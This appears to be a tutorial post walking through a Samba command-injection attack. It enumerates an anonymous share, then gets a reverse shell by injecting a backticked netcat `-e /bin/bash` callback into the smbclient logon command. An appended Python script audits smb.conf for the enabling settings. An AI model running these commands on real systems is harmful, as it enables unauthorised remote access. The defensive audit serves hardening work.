This post is about exploiting SMB (port 445) on a remote Linux system. The goal is to get remote access through an unprotected Samba server without using any exploitation tool or framework.
Prerequisites
How to use netcat
smbclient
Step 1. Scan the target machine and check for an open SMB port. In my case the target IP is 192.168.1.134.
Target m/c → 192.168.1.134
Attacker m/c → 192.168.1.129 (Kali Linux)
Kindly note that all tasks have been performed from the attacker m/c, 192.168.1.129.
Use smbclient to list the shares and check for anonymous access:
smbclient -L 192.168.1.134
{the password is nothing, just hit Enter}
Since we now know that a "tmp" share is present and that anonymous access to it is allowed, let's open netcat in terminal 1 to accept the reverse connection:
nc -lvp 7777
In terminal 2, open the tmp share directly on the Samba server using
smbclient //192.168.1.134/tmp
Type the help command in terminal 2.
Since the logon command is available, we can make the reverse connection with it (the port must match the one netcat is listening on; replace 'attack box ip' with the attacker's address):
logon "/=`nc 'attack box ip' 7777 -e /bin/bash`"
In terminal 1 you will get the reverse shell.
Type the following command in terminal 1 to get a proper terminal from the shell:
python -c "import pty;pty.spawn('/bin/bash');"
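What makes this possible on the server side is configuration: a share that is open to anonymous (guest) users, and the Samba "username map script" option, which passes the client-supplied logon name to a shell and so lets the backticks above execute. As an added defender's example, not part of the original post, here is a small Python audit of smb.conf that flags those settings; both sample configs and the script path in them are constructed.

```python
import configparser

# Constructed sample configs (not taken from the post's target machine).
# The mapusers.sh path is a hypothetical placeholder.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = Bad User
   username map script = /etc/samba/scripts/mapusers.sh

[tmp]
   path = /tmp
   guest ok = yes
   writable = yes
"""

HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = Never

[tmp]
   path = /tmp
   guest ok = no
   read only = yes
"""

def parse_smb_conf(text):
    """smb.conf is INI-style ([section] headers, 'key = value' lines, keys
    case-insensitive). RawConfigParser keeps values verbatim (no % expansion)."""
    cp = configparser.RawConfigParser(strict=False, allow_no_value=True)
    cp.read_string(text)
    return cp

def _yes(value):
    return str(value).strip().lower() in ("yes", "true", "1")

def audit_smb_conf(text):
    """Return (section, finding) pairs for the settings that enable the attack:
    a username-to-shell hook, guest mapping, and guest-accessible shares."""
    cp = parse_smb_conf(text)
    findings = []
    g = cp["global"] if cp.has_section("global") else {}
    if g.get("username map script"):
        findings.append(("global", "username map script hands the client-supplied "
                                   "username to a shell; remove it"))
    if g.get("map to guest", "Never").strip().lower() != "never":
        findings.append(("global", "map to guest lets unknown users in as guest"))
    if g.get("security", "user").strip().lower() == "share":
        findings.append(("global", "security = share disables per-user authentication"))
    for sec in cp.sections():
        if sec == "global":
            continue
        s = cp[sec]
        guest = _yes(s.get("guest ok", s.get("public", "no")))
        # A share is writable if writable/writeable = yes or read only = no.
        writable = _yes(s.get("writable", s.get("writeable", "no"))) or (
            s.get("read only") is not None and not _yes(s.get("read only")))
        path = s.get("path", "?")
        if guest and writable:
            findings.append((sec, f"guest-accessible writable share at {path}"))
        elif guest:
            findings.append((sec, f"guest-accessible share at {path}"))
    return findings
```

Run it against /etc/samba/smb.conf on the server; an empty result for the hardened sample shows what the config should look like after the share is locked down.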
Please feel free to contact me in case of any query nmapp@gmail.com